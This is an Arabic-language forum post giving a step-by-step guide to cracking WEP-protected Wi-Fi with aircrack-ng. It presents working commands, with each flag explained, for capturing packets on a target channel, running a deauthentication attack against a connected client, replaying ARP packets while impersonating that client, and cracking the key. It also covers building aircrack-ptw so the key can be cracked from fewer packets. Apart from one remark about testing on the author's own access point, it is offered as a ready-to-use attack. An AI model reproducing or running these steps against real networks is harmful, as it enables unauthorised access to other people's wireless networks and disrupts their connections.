السلام عليكم ورحمة الله ،،

هذا مختصر مفيد جمعته من قبل ، وأردت طرحة هنا بعدما كثرت الاسئلة والاستفسارات ، وهو ان شاء الله سهل ،،

بسم الله نبدأ ،،

كل خطوة من الخطوات فيها الكوماند في Shell وبعدين شرح تفصيلي له ،،


الخطوة الاولى :


كود:
. Open a console screen, then enter the following command to launch AiroDump which will "sniff" the packets about you.

Command = "airodump-ng -w capture -c 6 ath0"

"airodump-ng" is the program itself.
"-w capture" Gets it to write the sniffed packets to a file called "capture.cap".
"-c 6" Makes the program ONLY sniff on channel 6.
"ath0" The name of my wireless card.

Leave that running, and keep an eye on the MAC address of your desired AP and the packets/data increasing (the Data is the IV's)

الخطوة الثانية :-

كود:
. Open another console to be used to make AirePlay perform a DE-AUTH attack on a specific machine connected to that AP. This should make that specific machine disconnect and reconnect to the AP, and in the process make it send data to the AP which will include the WEP key.

Command = "aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0"

"aireplay-ng" is the program itself
"-e DLINK" is the name of the SSID of the target AP.
"-a 00:11:22:33:44:55" is the MAC address of the target AP.
"-c 66:77:88:99:00:AA" is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).
"--deauth 10" The type of attack we're performing, in this case it's the DEAUTH attack repeated 10 times.
"ath0" The name of my wireless card.

Have that command ready to go, but don't do it yet.


الخطوة الثالثة :

كود:
Open another console screen, and again we're going to use AIREPLAY, but this time it's going to capture some packets that might contain any IV data, then keep repeating to pump this info to the AP by "pretending" to be the target machine that the other instance of Aireplay performed the DEAUTH attack on.

Command = "aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0"

"aireplay-ng" Name of the program.
"--arpreplay" Is the function of aireplay you are trying to perform, in this case it's a replay of a ARP request, which will contain IV data.
"-b 00:11:22:33:44:55" MAC address of the target AP.
"-h 66:77:88:99:00:AA" MAC address of the target machine connected to that AP.
"ath0" Name of my wireless card.

Right, run that command, and you should see it searching for packets.

Fire off the previous command to initiate the DEAUTH attack, then switch back to the aireplay replay screen. And you should see it detect a deauth/discon of a machine, then it capture that packet, and start repeating to pump it back to the AP by pretending to be the target machine.

Flick over to airodump screen, and HOPEFULLY it should have lots of DATA or IV packets coming through.

You can close down the DEAUTH screen of aireplay now, and then let the other one keep replaying that packet until you feel you have enough packets to crack it, or just start the crack whilest more packets keep flooding through.


الخطوة الرابعة :

كود:
Open the FINAL console screen which will be used to run AirCrack which will scan the captured packets from AiroDump.

Command = "aircrack-ng capture.cap

"aircrack-ng" Name of the program.
"capture.cap" Name of the capture file being created by AiroDump.

I tested this on my home AP so i already knew the key, and only used one laptop.


بعد تطبيق هذه الخطوات راح تكون قادر على كسره عند جمع 200 الف وتستغرق حوالي 40 دقيقة ،،

---------------------------------------------------------------

استعمال AirCrack-ptw الجديد في كسر الملف :-

وهذا يساعد في كسر التشفير عند جمع 20 الف فقط ،، بعكس الاول اللي يجب عليك جمع 200 الف ،،

اول شيء تنزل البرنامج ، من هنا

https://www.wirelessdefence.org/Cont...w-1.0.0.tar.gz

ثم تفتحة في مجلد بهذا الامر

كود:
tar zxvf aircrack-ptw-[version].tar.gz
بعدين تدخل المجلد الجديد بهذا الامر :

كود:
cd aircrack-ptw-[version]
وبعدين ملف ال make فيه خطأ لازم تعدلة ،، تدخلة بالامر nano

كود:
nano make
راح تلاقي عده اسطر اخذ هذا
كود:
-lpcap
,وحطة في آخر سطر ال gcc ، هم سطرين فقط اللي تحتاج تنقل فيهم هذا ،

وبعدين تحفظ الملف ،، وتخرج ،،

وتكتب الامر

كود:
make
بعدها راح يكون شغال تمام التمام ،،

عاد تروح للمجلد وتشغل الامر التالي علشان تكسر تشفير الملف اللي جمعت فيه البكج قبل ،،

كود:
aircrack-ptw file.cap
ومبروك عليك

وحياكم الله وبياكم ،،